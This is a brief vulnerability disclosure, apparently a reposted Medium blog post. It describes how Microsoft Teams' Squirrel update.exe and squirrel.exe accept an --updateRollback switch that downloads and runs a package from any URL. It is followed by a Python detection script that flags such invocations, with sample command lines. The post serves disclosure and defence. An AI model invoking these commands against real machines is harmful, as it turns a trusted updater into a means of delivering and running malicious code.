Update: NuGet/Squirrel uncontrolled endpoints lead to arbitrary code execution
2019-07-02 13:46:02 Author: medium.com

Reegun J

Jul 1 · 1 min read

Part 1 : https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12

I found another vulnerable parameter through which Microsoft Teams remotely downloads and executes a payload.

Vulnerable parameter:

%localappdata%/Microsoft/Teams/update.exe --updateRollback=[URL to package]
%localappdata%/Microsoft/Teams/current/squirrel.exe --updateRollback=[URL to package]

Note: This affects Squirrel packages, which are widely used. I hope Microsoft Teams will be fixed as soon as possible.
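
A detection sketch for the switch described above, as an added example that is not part of the original post: it scans process-creation command lines for update.exe or squirrel.exe started with --updateRollback and alerts when the package host is not on an allowlist. The function names, the allowlist host and the sample command lines are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Binaries and switch named in the post.
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
# Hypothetical allowlist: replace with the package hosts you approve.
APPROVED_HOSTS = {"updates.corp.example"}

IMAGE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')
ROLLBACK = re.compile(r'--updateRollback(?:=|\s+)"?([^"\s]+)', re.IGNORECASE)


def check_command_line(cmdline, approved_hosts=APPROVED_HOSTS):
    """Return a finding for a Squirrel updater started with --updateRollback,
    or None when the command line is unrelated.

    Assumes the image path is quoted when it contains spaces, as
    process-creation logs normally record it."""
    image_match = IMAGE.match(cmdline)
    if not image_match:
        return None
    image = image_match.group(1) or image_match.group(2)
    # PureWindowsPath accepts both / and \ as separators.
    if PureWindowsPath(image).name.lower() not in SQUIRREL_BINARIES:
        return None
    arg = ROLLBACK.search(cmdline, image_match.end())
    if not arg:
        return None
    target = arg.group(1)
    try:
        host = (urlsplit(target).hostname or "").lower()
    except ValueError:  # malformed URL: treat as an unknown host
        host = ""
    return {"image": image, "target": target, "host": host,
            "alert": host not in approved_hosts}


def scan(events):
    """Return only the findings whose package host is not approved."""
    return [f for f in map(check_command_line, events) if f and f["alert"]]


# Constructed sample command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --updateRollback=https://pkg.example.invalid/rollback',
    r'C:\Users\alice\AppData\Local\Microsoft\Teams\current\Squirrel.exe --updateRollback=https://updates.corp.example/teams',
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'C:\Windows\System32\notepad.exe --updateRollback=https://pkg.example.invalid/x',
]
```

Calling scan(SAMPLE_EVENTS) returns one finding, the first sample, because its host is not in APPROVED_HOSTS.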


Source: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56